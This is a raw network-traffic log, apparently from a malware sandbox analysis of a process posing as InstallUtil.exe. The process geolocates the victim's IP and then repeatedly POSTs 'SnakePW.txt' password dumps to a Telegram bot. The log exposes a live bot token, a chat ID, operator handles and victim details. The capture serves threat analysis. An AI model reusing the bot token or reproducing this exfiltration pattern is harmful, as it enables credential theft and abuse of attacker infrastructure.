                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4192.168.2.549922104.21.80.14435148C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2025-01-13 10:45:49 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                    Host: reallyfreegeoip.org
                                                                                    Connection: Keep-Alive
                                                                                    2025-01-13 10:45:49 UTC857INHTTP/1.1 200 OK
                                                                                    Date: Mon, 13 Jan 2025 10:45:49 GMT
                                                                                    Content-Type: text/xml
                                                                                    Content-Length: 362
                                                                                    Connection: close
                                                                                    Age: 2079938
                                                                                    Cache-Control: max-age=31536000
                                                                                    cf-cache-status: HIT
                                                                                    last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=N%2FiqMxSnnTcLsha1faZkKFMPl4DSZEHB5Bseo9r4rhiW5rkyX7WsK16blnFxVQaEvgwbwqZprhyUbGHN%2BcXo7MJsHg0zZzo%2B8qOeMekDwTumyZTmJ1RLSfoF2ddjWy3KcmLkTyV%2F"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Server: cloudflare
                                                                                    CF-RAY: 9014cc88cf36c443-EWR
                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=1697&min_rtt=1694&rtt_var=637&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1723730&cwnd=244&unsent_bytes=0&cid=c4e2f42143e8cd67&ts=174&x=0"
                                                                                    2025-01-13 10:45:49 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                    Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5192.168.2.549930104.21.80.14435148C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2025-01-13 10:45:50 UTC61OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                    Host: reallyfreegeoip.org
                                                                                    2025-01-13 10:45:50 UTC855INHTTP/1.1 200 OK
                                                                                    Date: Mon, 13 Jan 2025 10:45:50 GMT
                                                                                    Content-Type: text/xml
                                                                                    Content-Length: 362
                                                                                    Connection: close
                                                                                    Age: 2079939
                                                                                    Cache-Control: max-age=31536000
                                                                                    cf-cache-status: HIT
                                                                                    last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=66g586%2FZVhhaB6P6v8KjWLUgxpnkrNx95opK7U7fyPPkm4rs5Ot4VPa6m2ozsir8AsGWE8EL0dZ3a1NAzl9OYlNQuFIKJz9xB8%2FbYnjXgpBv9%2BtvlmcvxaQ512AyjMJjStAWTaI3"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Server: cloudflare
                                                                                    CF-RAY: 9014cc908c69c443-EWR
                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=1692&min_rtt=1671&rtt_var=641&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1747456&cwnd=244&unsent_bytes=0&cid=aa24cc56b3c092a4&ts=154&x=0"
                                                                                    2025-01-13 10:45:50 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                    Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6192.168.2.549942104.21.80.14435148C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2025-01-13 10:45:51 UTC61OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                    Host: reallyfreegeoip.org
                                                                                    2025-01-13 10:45:52 UTC855INHTTP/1.1 200 OK
                                                                                    Date: Mon, 13 Jan 2025 10:45:52 GMT
                                                                                    Content-Type: text/xml
                                                                                    Content-Length: 362
                                                                                    Connection: close
                                                                                    Age: 2079941
                                                                                    Cache-Control: max-age=31536000
                                                                                    cf-cache-status: HIT
                                                                                    last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=kNIQvrA0KD%2Bw4x2%2Bf8WIRpsRx5J0qNdwQcWg9ctjpNUCQlxocGizRfUcAKU2VbbcttDPk19jCR0B88UmH76VUG7hd2hMZDxN2O6VSKmdQBHADhXYoQvh3j0iUE3gy5NID10%2Bj5AC"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Server: cloudflare
                                                                                    CF-RAY: 9014cc9809a48c0f-EWR
                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=1922&min_rtt=1915&rtt_var=734&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1476238&cwnd=223&unsent_bytes=0&cid=7861260721ea34e0&ts=141&x=0"
                                                                                    2025-01-13 10:45:52 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                    Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7192.168.2.549949104.21.80.14435148C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2025-01-13 10:45:53 UTC61OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                    Host: reallyfreegeoip.org
                                                                                    2025-01-13 10:45:53 UTC865INHTTP/1.1 200 OK
                                                                                    Date: Mon, 13 Jan 2025 10:45:53 GMT
                                                                                    Content-Type: text/xml
                                                                                    Content-Length: 362
                                                                                    Connection: close
                                                                                    Age: 2079942
                                                                                    Cache-Control: max-age=31536000
                                                                                    cf-cache-status: HIT
                                                                                    last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=L%2BBsNTn%2Fz6PQLWmAkeTmZetGrYz3T1RayL1aa%2FpFOpq9MKY7iyITR%2FgfI3KFZj0Uw6JooijWX7A4GOt2CSSPXs%2FjNN3CNcK%2Be7hX2JbsAY%2BkdbN3xckST2mji6ybAVQVYy%2BnXyip"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Server: cloudflare
                                                                                    CF-RAY: 9014cc9f6ebf7d0e-EWR
                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=1939&min_rtt=1933&rtt_var=737&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1472516&cwnd=244&unsent_bytes=0&cid=4720a0be268f426a&ts=154&x=0"
                                                                                    2025-01-13 10:45:53 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                    Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    8192.168.2.549990149.154.167.2204435148C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2025-01-13 10:45:59 UTC352OUTPOST /bot7500935106:AAHefL_Tof6QlJbfgUl9eKB1_ggGz2K7LgY/sendDocument?chat_id=1018401531&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                    Content-Type: multipart/form-data; boundary=------------------------8dd34bb765112f8
                                                                                    Host: api.telegram.org
                                                                                    Content-Length: 570
                                                                                    Connection: Keep-Alive
                                                                                    2025-01-13 10:45:59 UTC570OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 33 34 62 62 37 36 35 31 31 32 66 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 35 34 39 31 36 33 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 33 2f 30 31 2f 32 30 32 35 20 2f 20 30 35 3a 34 35 3a 31 36 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                                                                    Data Ascii: --------------------------8dd34bb765112f8Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:549163Date and Time: 13/01/2025 / 05:45:16Client IP:
                                                                                    2025-01-13 10:45:59 UTC388INHTTP/1.1 200 OK
                                                                                    Server: nginx/1.18.0
                                                                                    Date: Mon, 13 Jan 2025 10:45:59 GMT
                                                                                    Content-Type: application/json
                                                                                    Content-Length: 522
                                                                                    Connection: close
                                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                    Access-Control-Allow-Origin: *
                                                                                    Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                    2025-01-13 10:45:59 UTC522INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 30 38 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 35 30 30 39 33 35 31 30 36 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 43 41 52 4e 41 47 45 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 43 41 52 4e 41 47 45 30 30 37 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 30 31 38 34 30 31 35 33 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 61 64 64 61 66 69 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 4a 75 6e 69 6f 72 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 41 44 44 41 46 49 5f 4a 52 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 37 36 35 31 35 39
                                                                                    Data Ascii: {"ok":true,"result":{"message_id":108,"from":{"id":7500935106,"is_bot":true,"first_name":"CARNAGE","username":"CARNAGE007_bot"},"chat":{"id":1018401531,"first_name":"Gaddafi","last_name":"Junior","username":"GADDAFI_JR","type":"private"},"date":1736765159


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    9192.168.2.549994149.154.167.2204435148C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2025-01-13 10:46:09 UTC328OUTPOST /bot7500935106:AAHefL_Tof6QlJbfgUl9eKB1_ggGz2K7LgY/sendDocument?chat_id=1018401531&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                    Content-Type: multipart/form-data; boundary=------------------------8dd352ed47400c7
                                                                                    Host: api.telegram.org
                                                                                    Content-Length: 570
                                                                                    2025-01-13 10:46:09 UTC570OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 33 35 32 65 64 34 37 34 30 30 63 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 35 34 39 31 36 33 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 33 2f 30 31 2f 32 30 32 35 20 2f 20 30 35 3a 34 35 3a 31 36 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                                                                    Data Ascii: --------------------------8dd352ed47400c7Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:549163Date and Time: 13/01/2025 / 05:45:16Client IP:
                                                                                    2025-01-13 10:46:09 UTC388INHTTP/1.1 200 OK
                                                                                    Server: nginx/1.18.0
                                                                                    Date: Mon, 13 Jan 2025 10:46:09 GMT
                                                                                    Content-Type: application/json
                                                                                    Content-Length: 522
                                                                                    Connection: close
                                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                    Access-Control-Allow-Origin: *
                                                                                    Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                    2025-01-13 10:46:09 UTC522INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 30 39 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 35 30 30 39 33 35 31 30 36 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 43 41 52 4e 41 47 45 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 43 41 52 4e 41 47 45 30 30 37 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 30 31 38 34 30 31 35 33 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 61 64 64 61 66 69 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 4a 75 6e 69 6f 72 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 41 44 44 41 46 49 5f 4a 52 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 37 36 35 31 36 39
                                                                                    Data Ascii: {"ok":true,"result":{"message_id":109,"from":{"id":7500935106,"is_bot":true,"first_name":"CARNAGE","username":"CARNAGE007_bot"},"chat":{"id":1018401531,"first_name":"Gaddafi","last_name":"Junior","username":"GADDAFI_JR","type":"private"},"date":1736765169


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    10192.168.2.549995149.154.167.2204435148C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2025-01-13 10:46:10 UTC352OUTPOST /bot7500935106:AAHefL_Tof6QlJbfgUl9eKB1_ggGz2K7LgY/sendDocument?chat_id=1018401531&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                    Content-Type: multipart/form-data; boundary=------------------------8dd3538067b6556
                                                                                    Host: api.telegram.org
                                                                                    Content-Length: 570
                                                                                    Connection: Keep-Alive
                                                                                    2025-01-13 10:46:10 UTC570OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 33 35 33 38 30 36 37 62 36 35 35 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 35 34 39 31 36 33 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 33 2f 30 31 2f 32 30 32 35 20 2f 20 30 35 3a 34 35 3a 31 36 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                                                                    Data Ascii: --------------------------8dd3538067b6556Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:549163Date and Time: 13/01/2025 / 05:45:16Client IP:
                                                                                    2025-01-13 10:46:10 UTC388INHTTP/1.1 200 OK
                                                                                    Server: nginx/1.18.0
                                                                                    Date: Mon, 13 Jan 2025 10:46:10 GMT
                                                                                    Content-Type: application/json
                                                                                    Content-Length: 522
                                                                                    Connection: close
                                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                    Access-Control-Allow-Origin: *
                                                                                    Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                    2025-01-13 10:46:10 UTC522INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 31 30 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 35 30 30 39 33 35 31 30 36 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 43 41 52 4e 41 47 45 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 43 41 52 4e 41 47 45 30 30 37 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 30 31 38 34 30 31 35 33 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 61 64 64 61 66 69 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 4a 75 6e 69 6f 72 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 41 44 44 41 46 49 5f 4a 52 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 37 36 35 31 37 30
                                                                                    Data Ascii: {"ok":true,"result":{"message_id":110,"from":{"id":7500935106,"is_bot":true,"first_name":"CARNAGE","username":"CARNAGE007_bot"},"chat":{"id":1018401531,"first_name":"Gaddafi","last_name":"Junior","username":"GADDAFI_JR","type":"private"},"date":1736765170


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    11192.168.2.549996149.154.167.2204435148C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2025-01-13 10:46:11 UTC328OUTPOST /bot7500935106:AAHefL_Tof6QlJbfgUl9eKB1_ggGz2K7LgY/sendDocument?chat_id=1018401531&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                    Content-Type: multipart/form-data; boundary=------------------------8dd3543d18be98c
                                                                                    Host: api.telegram.org
                                                                                    Content-Length: 570
                                                                                    2025-01-13 10:46:11 UTC570OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 33 35 34 33 64 31 38 62 65 39 38 63 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 35 34 39 31 36 33 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 33 2f 30 31 2f 32 30 32 35 20 2f 20 30 35 3a 34 35 3a 31 36 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                                                                    Data Ascii: --------------------------8dd3543d18be98cContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:549163Date and Time: 13/01/2025 / 05:45:16Client IP:
                                                                                    2025-01-13 10:46:11 UTC388INHTTP/1.1 200 OK
                                                                                    Server: nginx/1.18.0
                                                                                    Date: Mon, 13 Jan 2025 10:46:11 GMT
                                                                                    Content-Type: application/json
                                                                                    Content-Length: 522
                                                                                    Connection: close
                                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                    Access-Control-Allow-Origin: *
                                                                                    Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                    2025-01-13 10:46:11 UTC522INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 31 31 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 35 30 30 39 33 35 31 30 36 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 43 41 52 4e 41 47 45 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 43 41 52 4e 41 47 45 30 30 37 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 30 31 38 34 30 31 35 33 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 61 64 64 61 66 69 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 4a 75 6e 69 6f 72 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 41 44 44 41 46 49 5f 4a 52 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 37 36 35 31 37 31
